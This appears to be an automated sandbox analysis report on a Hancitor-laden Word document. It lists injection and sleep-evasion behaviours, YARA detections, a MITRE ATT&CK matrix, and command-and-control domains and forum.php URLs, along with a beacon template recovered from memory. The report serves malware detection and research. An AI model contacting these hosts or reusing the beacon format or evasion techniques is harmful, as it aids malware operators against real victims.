              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Contains functionality to detect sleep reduction / modifications
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0280F83C5_2_0280F83C
              Source: C:\Windows\SysWOW64\rundll32.exe TID: 6628Thread sleep count: 261 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exe TID: 6628Thread sleep time: -15660000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exe TID: 6628Thread sleep count: 268 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exe TID: 6628Thread sleep time: -16080000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_5-49544
              Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 6.8 %
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0280F83C5_2_0280F83C
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\{9C081570-F32B-46C7-9B47-B1E0B2DF993E}\jax.kJump to dropped file
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,5_2_0281CA50
              Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 60000Jump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 60000Jump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_5-49634
              Source: rundll32.exe, 00000005.00000003.1759002125.0000000002964000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW|
              Source: rundll32.exe, 00000005.00000003.1759002125.0000000002964000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW&
              Source: rundll32.exe, 00000005.00000003.1759002125.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2620736040.000000000291A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2417726399.0000000002932000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2118717721.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1870913373.0000000002933000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@R
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_027F8DCC GetSystemInfo,5_2_027F8DCC
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_027D8948 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,5_2_027D8948
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_027D55A4 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,5_2_027D55A4
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_02861584 GetEnhMetaFileW,GetEnhMetaFileW,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,LoadLibraryA,GetProcAddress,VirtualAllocEx,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,LoadCursorW,DeleteObject,DeleteObject,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,LoadCursorW,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontR5_2_02861584
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_042D1390 GetProcessHeap,RtlAllocateHeap,5_2_042D1390
              Source: C:\Windows\SysWOW64\rundll32.exeMemory protected: page write copy | page execute | page execute read | page execute and read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              System process connects to network (likely due to code injection or exploit)
              Source: C:\Windows\SysWOW64\rundll32.exeDomain query: thowerteigime.com
              Source: C:\Windows\SysWOW64\rundll32.exeDomain query: euvereginumet.ru
              Source: C:\Windows\SysWOW64\rundll32.exeDomain query: rhopulforopme.ru
              Source: C:\Windows\SysWOW64\rundll32.exeDomain query: api.ipify.org
              Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 64.185.227.155 80Jump to behavior
              Contains functionality to inject threads in other processes
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_042D3880 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,CloseHandle,VirtualAlloc,CreateThread,CloseHandle,5_2_042D3880
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,5_2_027D575C
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,5_2_027D6070
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,5_2_027D606E
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,GetACP,5_2_027DCA44
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,5_2_027DB454
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,5_2_027DB408
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,5_2_027D5868
              Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_027D9ED4 GetLocalTime,5_2_027D9ED4
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_02838ED0 GetVersion,5_2_02838ED0

              Stealing of Sensitive Information

              barindex
              Yara detected CryptOne packer
              Source: Yara matchFile source: 00000005.00000002.2668727144.00000000028D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

              Remote Access Functionality

              barindex
              Yara detected CryptOne packer
              Source: Yara matchFile source: 00000005.00000002.2668727144.00000000028D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Yara detected Hancitor
              Source: Yara matchFile source: 5.2.rundll32.exe.28e0000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.rundll32.exe.42d0000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.rundll32.exe.28d0174.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.rundll32.exe.28e0000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.rundll32.exe.42d0000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.rundll32.exe.28d0174.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000005.00000002.2668727144.00000000028D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2673527678.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2668984250.00000000028E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6624, type: MEMORYSTR

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid Accounts22
              Scripting              		Path Interception21
              Process Injection              		1
              Disable or Modify Tools              		21
              Input Capture              		1
              System Time Discovery              		Remote Services1
              Archive Collected Data              		Exfiltration Over Other Network Medium2
              Ingress Tool Transfer              		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default Accounts2
              Native API              		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
              Deobfuscate/Decode Files or Information              		LSASS Memory2
              File and Directory Discovery              		Remote Desktop Protocol1
              Screen Capture              		Exfiltration Over Bluetooth2
              Encrypted Channel              		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain Accounts23
              Exploitation for Client Execution              		Logon Script (Windows)Logon Script (Windows)22
              Scripting              		Security Account Manager26
              System Information Discovery              		SMB/Windows Admin Shares21
              Input Capture              		Automated Exfiltration2
              Non-Application Layer Protocol              		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)21
              Obfuscated Files or Information              		NTDS231
              Security Software Discovery              		Distributed Component Object Model12
              Clipboard Data              		Scheduled Transfer112
              Application Layer Protocol              		SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
              Software Packing              		LSA Secrets11
              Virtualization/Sandbox Evasion              		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.common11
              Masquerading              		Cached Domain Credentials11
              Application Window Discovery              		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup Items11
              Virtualization/Sandbox Evasion              		DCSync1
              Remote System Discovery              		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job21
              Process Injection              		Proc Filesystem1
              System Network Configuration Discovery              		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
              Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
              Rundll32              		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              0524_4109399728218.doc66%VirustotalBrowse
              0524_4109399728218.doc66%ReversingLabsDocument-Word.Trojan.Hancitor
              0524_4109399728218.doc100%AviraHEUR/AGEN.1328612
              0524_4109399728218.doc100%Joe Sandbox ML

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRF{C2D2D63F-941A-4D9F-9B45-35DA529A3C61}.tmp100%AviraHEUR/AGEN.1328612
              C:\Users\user\AppData\Local\Temp\{9C081570-F32B-46C7-9B47-B1E0B2DF993E}\jax.k77%ReversingLabsWin32.Trojan.Hancitor
              c:\users\user\appdata\roaming\microsoft\word\startup\ket.t (copy)77%ReversingLabsWin32.Trojan.Hancitor

              Unpacked PE Files

              SourceDetectionScannerLabelLinkDownload
              5.2.rundll32.exe.42d0000.3.unpack100%AviraTR/Hijacker.GenDownload File
              5.2.rundll32.exe.27d0000.0.unpack100%AviraHEUR/AGEN.1323277Download File
              5.2.rundll32.exe.28d0174.1.unpack100%AviraTR/Kazy.4159236Download File

              Domains

              SourceDetectionScannerLabelLink
              thowerteigime.com16%VirustotalBrowse
              euvereginumet.ru10%VirustotalBrowse
              rhopulforopme.ru13%VirustotalBrowse

              URLs

              SourceDetectionScannerLabelLink
              http://schemas.m0%URL Reputationsafe
              http://www.w3.o0%URL Reputationsafe
              http://rhopulforopme.ru/8/forum.phpme.ru/8/forum.phpe100%Avira URL Cloudmalware
              http://euvereginumet.ru/8/forum.phpme.ru/8/forum.php100%Avira URL Cloudmalware
              http://api.ipify.org0.0.0.0ncdrlebGUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)GUID0%Avira URL Cloudsafe
              http://thowerteigime.com/8/forum.phpv100%Avira URL Cloudmalware
              http://thowerteigime.com/8/forum.phpe.ru/8/forum.phpe100%Avira URL Cloudmalware
              http://thowerteigime.com/8/forum.phporopme.ru5100%Avira URL Cloudmalware
              http://rhopulforopme.ru/8/forum.phpe.ru/8/forum.php100%Avira URL Cloudmalware
              http://rhopulforopme.ru/8/forum.php.ru/8/forum.ph100%Avira URL Cloudmalware
              http://rhopulforopme.ru/8/forum.phpet.ru/8/forum.php100%Avira URL Cloudmalware
              http://euvereginumet.ru/8/forum.phpt.ru/8/forum.php100%Avira URL Cloudmalware
              http://thowerteigime.com/8/forum.phpe.ru/8/forum.phps100%Avira URL Cloudmalware
              http://rhopulforopme.ru/8/forum.phpv100%Avira URL Cloudmalware
              http://rhopulforopme.ru/8/forum.php7100%Avira URL Cloudmalware
              http://thowerteigime.com/8/forum.php100%Avira URL Cloudmalware
              http://thowerteigime.com/8/forum.phpe.ru/8/forum.php7100%Avira URL Cloudmalware
              http://rhopulforopme.ru/8/forum.phpme.ru/8/forum.php100%Avira URL Cloudmalware
              http://euvereginumet.ru/8/forum.phpteigime.com5100%Avira URL Cloudmalware
              http://euvereginumet.ru/8/forum.php100%Avira URL Cloudmalware
              http://euvereginumet.ru/8/forum.phpe100%Avira URL Cloudmalware
              http://rhopulforopme.ru/8/forum.phpe100%Avira URL Cloudmalware
              http://thowerteigime.com/8/forum.phpt.ru/8/forum.phpe100%Avira URL Cloudmalware
              http://euvereginumet.ru/8/forum.phpj100%Avira URL Cloudmalware
              http://thowerteigime.com/8/forum.phpe.ru/8/forum.php100%Avira URL Cloudmalware
              http://euvereginumet.ru/8/forum.phpl100%Avira URL Cloudmalware
              http://rhopulforopme.ru/8/forum.phpj100%Avira URL Cloudmalware
              http://rhopulforopme.ru/8/forum.phpl100%Avira URL Cloudmalware
              http://euvereginumet.ru/8/forum.phps100%Avira URL Cloudmalware
              http://rhopulforopme.ru/8/forum.phps100%Avira URL Cloudmalware
              http://rhopulforopme.ru/8/forum.phpCon100%Avira URL Cloudmalware
              http://thowerteigime.com/8/forum.phper$100%Avira URL Cloudmalware
              http://euvereginumet.ru/8/forum.php7100%Avira URL Cloudmalware
              http://euvereginumet.ru/8/forum.phpCon100%Avira URL Cloudmalware
              http://rhopulforopme.ru/8/forum.phpginumet.ru5100%Avira URL Cloudmalware
              http://thowerteigime.com/8/forum.phpCon100%Avira URL Cloudmalware
              http://rhopulforopme.ru/8/forum.php100%Avira URL Cloudmalware
              http://euvereginumet.ru/8/forum.php.ru/8/forum.ph100%Avira URL Cloudmalware
              http://thowerteigime.com/8/forum.php.ru/8/forum.ph100%Avira URL Cloudmalware
              http://thowerteigime.com/8/forum.phpl100%Avira URL Cloudmalware
              http://thowerteigime.com/8/forum.phporopme.ruc100%Avira URL Cloudmalware

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              api4.ipify.org
              		64.185.227.155
              		truefalse
                		high
                thowerteigime.com
                		unknown
                		unknowntrueunknown
                euvereginumet.ru
                		unknown
                		unknowntrueunknown
                api.ipify.org
                		unknown
                		unknownfalse
                  		high
                  rhopulforopme.ru
                  		unknown
                  		unknowntrueunknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://thowerteigime.com/8/forum.phptrue
                  • Avira URL Cloud: malware
                  		unknown
                  http://euvereginumet.ru/8/forum.phptrue
                  • Avira URL Cloud: malware
                  		unknown
                  http://api.ipify.org/false
                    		high
                    http://rhopulforopme.ru/8/forum.phptrue
                    • Avira URL Cloud: malware
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://rhopulforopme.ru/8/forum.phpme.ru/8/forum.phperundll32.exe, 00000005.00000003.1777395785.0000000002933000.00000004.00000020.00020000.00000000.sdmptrue
                    • Avira URL Cloud: malware
                    		unknown
                    http://thowerteigime.com/8/forum.phpvrundll32.exe, 00000005.00000003.2278515571.0000000002954000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2244437133.0000000002954000.00000004.00000020.00020000.00000000.sdmptrue
                    • Avira URL Cloud: malware
                    		unknown
                    http://api.ipify.org0.0.0.0ncdrlebGUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)GUIDrundll32.exe, 00000005.00000002.2668727144.00000000028D0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.2673527678.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.2668984250.00000000028E0000.00000040.00001000.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		low
                    http://schemas.msplwow64.exe, 00000002.00000003.1442047761.000000000298A000.00000004.00000020.00020000.00000000.sdmp, splwow64.exe, 00000002.00000003.1443327802.0000000002998000.00000004.00000020.00020000.00000000.sdmp, splwow64.exe, 00000002.00000003.1445347987.0000000002998000.00000004.00000020.00020000.00000000.sdmp, splwow64.exe, 00000002.00000003.1442333308.0000000002998000.00000004.00000020.00020000.00000000.sdmp, splwow64.exe, 00000002.00000003.1444033953.0000000002998000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://thowerteigime.com/8/forum.phpe.ru/8/forum.phperundll32.exe, 00000005.00000003.2199214201.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2309854794.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2224817943.0000000002934000.00000004.00000020.00020000.00000000.sdmptrue
                    • Avira URL Cloud: malware
                    		unknown
                    http://euvereginumet.ru/8/forum.phpme.ru/8/forum.phprundll32.exe, 00000005.00000003.1759002125.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2166981551.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1762608183.0000000002933000.00000004.00000020.00020000.00000000.sdmptrue
                    • Avira URL Cloud: malware
                    		unknown
                    http://thowerteigime.com/8/forum.phporopme.ru5rundll32.exe, 00000005.00000003.2628991391.0000000002925000.00000004.00000020.00020000.00000000.sdmptrue
                    • Avira URL Cloud: malware
                    		unknown
                    http://api.ipify.org/Drundll32.exe, 00000005.00000003.1759002125.0000000002933000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      http://rhopulforopme.ru/8/forum.phpe.ru/8/forum.phprundll32.exe, 00000005.00000003.2210739764.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2212107841.0000000002934000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: malware
                      		unknown
                      http://rhopulforopme.ru/8/forum.php.ru/8/forum.phrundll32.exe, 00000005.00000003.2118717721.0000000002933000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: malware
                      		unknown
                      http://rhopulforopme.ru/8/forum.phpet.ru/8/forum.phprundll32.exe, 00000005.00000003.1997207362.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2295617717.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2299435821.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2293982468.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2504428556.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1784421545.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1878016412.0000000002933000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: malware
                      		unknown
                      http://euvereginumet.ru/8/forum.phpt.ru/8/forum.phprundll32.exe, 00000005.00000003.1956435395.0000000002934000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: malware
                      		unknown
                      http://thowerteigime.com/8/forum.phpe.ru/8/forum.phpsrundll32.exe, 00000005.00000003.2203720473.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2229738232.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2261262500.0000000002933000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: malware
                      		unknown
